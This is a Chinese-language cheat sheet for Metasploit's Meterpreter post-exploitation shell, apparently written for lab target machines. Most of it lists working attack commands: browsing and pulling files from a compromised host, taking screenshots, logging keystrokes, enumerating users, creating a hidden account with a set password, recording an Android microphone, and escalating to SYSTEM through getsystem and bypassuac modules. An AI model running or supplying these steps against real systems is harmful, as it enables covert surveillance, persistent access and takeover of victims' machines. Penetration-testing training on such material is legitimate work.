目录
1、文件交互指令
2、上传下载文件(windows)
3、屏幕截图(windows)
4、键盘记录(windows)
1、先启动记录keyscan_start
2、显示键盘输入内容keyscan_dump
3、结束监控keyscan_stop
5、创建账户(windows)
1、先看下目标靶机已存在用户
2、使用getgui创建 一个用户名为 xiaowei 密码为 123456 的账户
6、音频录像(Android)
7、提权(Windows)
方法一:
方法二:
1、文件交互指令
| Command | Description |
| cd{路径} | 切换靶机目录 |
| cat | 读取文件目录 |
| cp | 复制文件到目标 |
| mv | 移动到目标 |
| chmod | 修改文件的权限(chmod 777 shell.elf) |
| del/rm | 删除靶机目录 |
| dir | 打印靶机目录 |
| mkdir | 在靶机上创建目录 |
| rmdir | 靶机删除目录 |
| edit{文件所在地址或名} | 编辑文件 |
| getlwd | 打印本地目录路径 |
| getwd | 打印靶机目录路径 |
| lcd | 更改本地目录 |
| lls | 列出本地目录 |
| ls | 列出靶机的目录 |
| lpwd | 打印本地目录 |
| pwd | 打印工作目录 |
| search | 搜索文件 详细search -h |
| etc |
2、上传下载文件(windows)
| Command | Description |
| upload | 传文件到靶机 |
| download | 从靶机下载文件 |
3、屏幕截图(windows)
| Command | Description |
| screenshot | 截图(Windows) |
4、键盘记录(windows)
1、先启动记录keyscan_start
2、显示键盘输入内容keyscan_dump
3、结束监控keyscan_stop
5、创建账户(windows)
1、先看下目标靶机已存在用户
meterpreter中输入:run post/windows/gather/enum_logged_on_users
2、使用getgui创建 一个用户名为 xiaowei 密码为 123456 的账户
run getgui -u xiaowei -p 123456run getgui -u {用户名}-p {密码}
注意:
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。
如果仍然出现错误,绕过UAC提权:
- 先输入bg,进入后台
- 使用这个模块use exploit/windows/local/ask
- options查看需要配置哪些模块
- run
6、音频录像(Android)
record_mic -h 查看使用方法
开始录音
7、提权(Windows)
先输入getuid查看当前用户的权限,可知为普通用户。
方法一:
getsystem
方法二:
使用msf模块提权
先进入msf后台bg或者background
- 查询可以提权的模块 search bypassuac 查看提权模块
- 选择一个适合当前系统的提权模块 use 1(如果没有成功就选择其他模块)
- 配置模块使用参数 options (session值可以在终端直接输入session得到)
- 可以看到需要配置session set session {需要提权的session id}
- 执行提权 run
- 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限
